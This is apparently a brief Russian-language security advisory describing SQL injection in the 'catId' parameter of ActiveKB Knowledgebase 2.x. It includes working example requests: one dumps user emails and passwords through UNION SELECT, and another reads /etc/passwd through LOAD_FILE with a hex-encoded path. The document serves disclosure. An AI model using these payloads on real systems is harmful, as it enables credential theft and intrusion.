Программа: ActiveKB Knowledgebase 2.x

Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных в параметре «catId» сценарием index.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.

Примеры:

/kb/index.php?ToDo=browse&catId=[SQL CODE]

http://www.xxx.net/kb/index.html?ToDo=browse&catId= -20+union+select+1,concat(email,0x3a,password,0x3a,userid),3,4,5,6,7 +from+user—

https://www.xxx.com/faq/index.php?ToDo= browse&catId=-10+union+select+1,LOAD_FILE( 0x2f6574632f706173737764),3,4,5,6,7+members/*



Оставить мнение